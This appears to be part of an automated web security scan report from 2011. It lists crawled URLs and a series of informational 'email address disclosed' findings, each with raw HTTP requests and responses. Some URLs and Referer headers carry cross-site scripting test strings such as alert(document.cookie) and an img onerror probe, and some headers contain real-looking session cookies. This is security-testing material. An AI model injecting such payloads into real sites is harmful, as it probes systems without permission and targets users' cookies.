http://jquery.malsup.com/license.html
http://jqueryui.com/about
http://lec.edu/fckeditor/editor/fckeditor.php
http://login.live.com/login.srf
https://login.live.com/login.srf
http://medienfreunde.com/lab/innerfade/js/jquery.innerfade.js
http://mir.aculo.us/
http://mofones.com/
http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/
http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/
http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/
http://pressroom.orbitz.com/
https://publish.omniture.com/center/util/
http://scripts.omniture.com/javascript.js
https://secure.avangate.com/order/nojs.php
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js
https://sitesearch.omniture.com/center/util/
http://stackoverflow.com/questions/1890512/handling-errors-in-jquerydocument-ready
http://static1.degreetree.com/fossa/assets/jsx/ext-2.2.1/ext.js
http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/
http://trw.mediaroom.com/index.php
http://tv.msn.com/last-night-on-tv/
http://twitter.com/JohnsHopkinsSPH
http://twitter.com/about/contact
http://twitter.com/arnui
http://twitter.com/javascripts/widgets/widget.js
https://twitter.com/about/contact
https://twitter.com/signup
http://webcache.googleusercontent.com/search
http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html
https://www.astaro.co.uk/beacon/(beid
http://www.astaro.com/
http://www.astaro.com/advanced
http://www.astaro.com/buy-astaro
http://www.astaro.com/callback
http://www.astaro.com/company/advanced
http://www.astaro.com/company/astaro-management-team
http://www.astaro.com/company/astaro-supervisory-board
http://www.astaro.com/company/career
http://www.astaro.com/company/company-profile
http://www.astaro.com/company/contact-astaro
http://www.astaro.com/company/javascript:void()
http://www.astaro.com/company/sponsorship
http://www.astaro.com/company/worldwide-offices
http://www.astaro.com/gateway/builder/settings
http://www.astaro.com/javascript:void()
http://www.astaro.com/landingpages/data/en-privacy-policy.html
http://www.astaro.com/legal-statement
http://www.astaro.com/newsletter
http://www.astaro.com/products
http://www.astaro.com/products/access-points
http://www.astaro.com/products/astaro-clients
http://www.astaro.com/products/astaro-command-center
http://www.astaro.com/products/astaro-red
http://www.astaro.com/products/astaro-security-gateway-software-appliance
http://www.astaro.com/products/astaro-security-gateway-virtual-appliance-for-vmware
http://www.astaro.com/products/astaro-smart-installer
http://www.astaro.com/products/hardware-appliances
https://www.astaro.com/beacon/(beid
https://www.astaro.com/design/en/javascript/jquery.dimensions.js
https://www.astaro.com/en
https://www.astaro.com/en/content/advancedsearch
https://www.astaro.com/en/myastaro
https://www.astaro.com/en/myastaro/contact_us
https://www.astaro.com/en/user/login
https://www.astaro.com/tool/signup
https://www.astaro.com/user/login
https://www.astaro.de/beacon/(beid
http://www.astaro.es/
https://www.astaro.net/beacon/(beid
http://www.bing.com/s/osd3.xml
http://www.cs.tut.fi/~jkorpela/quirks-mode.html,
http://www.dillerdesign.com/experiment/DD_belatedPNG/
http://www.directstartv.com/
http://www.ehow.com/about_us/about_us.aspx
http://www.ehow.com/about_us/faq_ehow.aspx
http://www.ehow.com/privacy.aspx
http://www.ehow.com/terms_use.aspx
https://www.ehow.com/privacy.aspx
https://www.ehow.com/terms_use.aspx
http://www.exploit-db.com/exploits/15313/
http://www.faneuilhallmarketplace.com/
http://www.gnu.org/copyleft/gpl.html
http://www.gnu.org/licenses/gpl.html
http://www.google.com/finance
http://www.google.com/search
https://www.google.com/accounts/Login
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.huddletogether.com/projects/lightbox2/
http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js
http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js
http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a
http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html
http://www.millenniumhotels.co.nz/copthornebayofislands/index.html
http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html
http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html
http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html
http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html
http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html
http://www.millenniumhotels.co.nz/copthornehokianga/index.html
http://www.millenniumhotels.co.nz/copthornemarlborough/index.html
http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html
http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html
http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html
http://www.millenniumhotels.co.nz/copthornewairarapa/index.html
http://www.millenniumhotels.co.nz/kingsgateauckland/index.html
http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html
http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html
http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html
http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html
http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html
http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html
http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html
http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html
http://www.millenniumhotels.co.nz/kingsgateteanau/index.html
http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html
http://www.millenniumhotels.co.nz/kingsgatewellington/index.html
http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html
http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html
http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html
http://www.millenniumhotels.co.nz/millenniumrotorua/index.html
http://www.millenniumhotels.co.nz/millenniumtaupo/index.html
http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html
http://www.millenniumhotels.co.uk/copthornebirmingham/index.html
http://www.millenniumhotels.co.uk/copthornecardiff/index.html
http://www.millenniumhotels.co.uk/copthornedudley/index.html
http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html
http://www.millenniumhotels.co.uk/copthornegatwick/index.html
http://www.millenniumhotels.co.uk/copthornemanchester/index.html
http://www.millenniumhotels.co.uk/copthornenewcastle/index.html
http://www.millenniumhotels.co.uk/copthorneplymouth/index.html
http://www.millenniumhotels.co.uk/copthornereading/index.html
http://www.millenniumhotels.co.uk/copthornesheffield/index.html
http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html
http://www.millenniumhotels.co.uk/copthornetarakensington/index.html
http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html
http://www.millenniumhotels.co.uk/millenniumglasgow/index.html
http://www.millenniumhotels.co.uk/millenniumgloucester/index.html
http://www.millenniumhotels.co.uk/millenniumkensington/index.html
http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html
http://www.millenniumhotels.co.uk/millenniummayfair/index.html
http://www.millenniumhotels.co.uk/millenniumreading/index.html
http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html
http://www.millenniumhotels.com/ae/goldmohurhoteladen/index.html
http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html
http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html
http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html
http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html
http://www.millenniumhotels.com/ae/millenniumdubai/index.html
http://www.millenniumhotels.com/cn/copthorneqingdao/index.html
http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html
http://www.millenniumhotels.com/cn/millenniumchengdu/index.html
http://www.millenniumhotels.com/cn/millenniumshanghai/index.html
http://www.millenniumhotels.com/cn/millenniumwuxi/index.html
http://www.millenniumhotels.com/cn/millenniumxiamen/index.html
http://www.millenniumhotels.com/corporate/hotels/kingsgateHotels.htm
http://www.millenniumhotels.com/corporate/legalInfo.html
http://www.millenniumhotels.com/corporate/privacyPolicy.html
http://www.millenniumhotels.com/corporate/termsConditions.html
http://www.millenniumhotels.com/de/copthornehannover/index.html
http://www.millenniumhotels.com/de/millenniumstuttgart/index.html
http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html
http://www.millenniumhotels.com/fr/millenniumparis/index.html
http://www.millenniumhotels.com/id/millenniumjakarta/index.html
http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html
http://www.millenniumhotels.com/millenniumanchorage/index.html
http://www.millenniumhotels.com/millenniumboston/attractions/
http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html
http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html
http://www.millenniumhotels.com/millenniumboston/attractions/index.html
http://www.millenniumhotels.com/millenniumboston/contactus/index.html
http://www.millenniumhotels.com/millenniumboston/facilities/
http://www.millenniumhotels.com/millenniumboston/facilities/index.html
http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html
http://www.millenniumhotels.com/millenniumboston/gallery/index.html
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/meeting/index.html
http://www.millenniumhotels.com/millenniumboston/news/index.html
http://www.millenniumhotels.com/millenniumboston/restaurant/
http://www.millenniumhotels.com/millenniumboston/restaurant/index.html
http://www.millenniumhotels.com/millenniumboston/rooms/
http://www.millenniumhotels.com/millenniumboston/rooms/index.html
http://www.millenniumhotels.com/millenniumboston/rooms/suite.html
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html
http://www.millenniumhotels.com/millenniumboulder/index.html
http://www.millenniumhotels.com/millenniumbuffalo/index.html
http://www.millenniumhotels.com/millenniumchicago/index.html
http://www.millenniumhotels.com/millenniumcincinnati/index.html
http://www.millenniumhotels.com/millenniumdurham/index.html
http://www.millenniumhotels.com/millenniumlosangeles/index.html
http://www.millenniumhotels.com/millenniumminneapolis/index.html
http://www.millenniumhotels.com/millenniumnashville/index.html
http://www.millenniumhotels.com/millenniumnewyork/index.html
http://www.millenniumhotels.com/millenniumscottsdale/index.html
http://www.millenniumhotels.com/millenniumstlouis/index.html
http://www.millenniumhotels.com/millenniumunplazanewyork/index.html
http://www.millenniumhotels.com/my/copthornepenang/index.html
http://www.millenniumhotels.com/opening/millenniumveetaichung.html
http://www.millenniumhotels.com/ph/heritagemanila/index.html
http://www.millenniumhotels.com/premierhotelnewyork/index.html
http://www.millenniumhotels.com/qa/millenniumdoha/index.html
http://www.millenniumhotels.com.cn/
http://www.millenniumhotels.com.sg/StudioMHotel/index.html
http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html
http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html
http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html
http://www.millenniumhotels.com.sg/mhotelsingapore/index.html
http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html
http://www.msnbc.msn.com/id/3032118/ns/technology_and_science
http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/
http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/
http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar
http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/
http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting
http://www.msnbc.msn.com/id/41359879/ns/us_news-life/
http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts
http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.msn.com/id/41363738/ns/weather
http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/
http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times
http://www.msnbc.msn.com/id/41365053
http://www.msnbc.msn.com/id/41365053/ns/weather/
http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa
http://www.msnbc.msn.com/id/41367374/ns/world_news-europe
http://www.nolanfans.com/
http://www.omniture.com/en/education
http://www.omniture.com/en/education/academic_initiative
http://www.omniture.com/en/education/certification
http://www.omniture.com/en/education/certification/implementation
http://www.omniture.com/en/education/certification/insight_analyst
http://www.omniture.com/en/education/certification/insight_architect
http://www.omniture.com/en/education/certification/search_center
http://www.omniture.com/en/education/certification/site_catalyst
http://www.omniture.com/en/education/certification/support
http://www.omniture.com/en/education/certification/test_target
http://www.omniture.com/en/education/courses/discover
http://www.omniture.com/en/education/courses/dop_analyst
http://www.omniture.com/en/education/courses/merchandising
http://www.omniture.com/en/education/courses/online_marketing_suite
http://www.omniture.com/en/education/courses/sbu
http://www.omniture.com/en/education/courses/searchcenter
http://www.omniture.com/en/education/courses/sitesearch
http://www.omniture.com/en/education/courses/survey
http://www.omniture.com/en/education/courses/testandtarget
http://www.omniture.com/en/privacy/policy
http://www.omniture.com/press/867
http://www.omniture.com/press/868
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp
http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js
http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp
http://www.owasp.org/index.php
http://www.rascals.eu/
http://www.revresda.com/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=31,43,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,66867,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68376,102874,102875,103013,103016&RawValues=&/
http://www.revresda.com/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=46,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,67440,67898,67941,67944,68027,68032,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&/
http://www.robtex.com/as/as15169.html
http://www.robtex.com/as/as26415.html
http://www.robtex.com/as/as36617.html
http://www.robtex.com/as/as36618.html
http://www.robtex.com/as/as36620.html
http://www.robtex.com/as/as36621.html
http://www.robtex.com/as/as36623.html
http://www.robtex.com/as/as36624.html
http://www.robtex.com/as/as36625.html
http://www.robtex.com/as/as36626.html
http://www.robtex.com/as/as36629.html
http://www.robtex.com/dns/orkut.com.html
http://www.robtex.com/faq.html
http://www.scmagazineus.com/search/xss/
http://www.sitepoint.com/article/browser-specific-css-hacks
http://www.threatexpert.com/contact.aspx
http://www.trip.com/
http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html
http://www.w3.org/TR/html4/strict.dtd
http://www.wordpresstemplates.com/
http://www.worldmastiffforum.com/
http://www.xss.com/
http://xss-proxy.sourceforge.net/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. http://a.cdn.intentmedia.net/javascripts/intent_media_orbitz_ads_fif.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.cdn.intentmedia.net
Path:	/javascripts/intent_media_orbitz_ads_fif.js

Issue detail

The following email address was disclosed in the response:

sponsoredsearch@orbitz.com

Request

GET /javascripts/intent_media_orbitz_ads_fif.js HTTP/1.1
Host: a.cdn.intentmedia.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: 4zEoYdoLwoHpuG6BVJFrbgYdT+dnUj+HTowk4uXMAkuCawHoIMxjtxEzv+rDlO+J
x-amz-request-id: 1C91434B850D666D
Date: Tue, 01 Feb 2011 00:34:37 GMT
Last-Modified: Fri, 28 Jan 2011 18:12:39 GMT
ETag: "3dbedc2d1c937fe5721d7f0076aae033"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 28119
Server: AmazonS3
Age: 53374
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 452c767e849eb6992c1af8dd24e99ea09fdd8bb48618e348b8d10dd0543facc24678ec1f685e4e79
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 0aaebdec7b7b36cd00d258b6c14bcc46.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

var IntentMedia=(function(a){a.BASE_URL="http://a.intentmedia.net:80";a.IMPRESSION_URL=a.BASE_URL+"/adServer/impressions?";a.SECURE_BASE_URL="https://a.intentmedia.net:443";a.CONVERSION_URL=a.SECURE_B
...[SNIP]...
<a href="mailto:sponsoredsearch@orbitz.com">sponsoredsearch@orbitz.com</a>
...[SNIP]...

21.2. http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a3.twimg.com
Path:	/a/1296609216/javascripts/widgets/widget.js

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

Response

21.3. https://admin.testandtarget.omniture.com/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.testandtarget.omniture.com
Path:	/a

Issue detail

The following email address was disclosed in the response:

tt-support@omniture.com

Request

Response

21.4. https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.testandtarget.omniture.com
Path:	/errors/browser_unsupported.jsp

Issue detail

The following email address was disclosed in the response:

tt-support@omniture.com

Request

Response

21.5. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d4974e4@www.ehow.com

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(document.cookie)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@5@4d4974c7@www.ehow.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:14:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@6@4d4974e4@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.6. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d4974ba@www.ehow.com

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@3@4d4974ad@www.ehow.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:14:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@4@4d4974ba@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.7. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d497578@www.ehow.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:17:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@9@4d497578@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.8. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d4974c7@www.ehow.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:14:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@5@4d4974c7@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.9. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d497418@www.ehow.com

Request

Response

21.10. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d4974f0@www.ehow.com

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/MailingList.html?category=Computer+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@7@4d4974ee@www.ehow.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:14:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@8@4d4974f0@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.11. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d4974ad@www.ehow.com

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
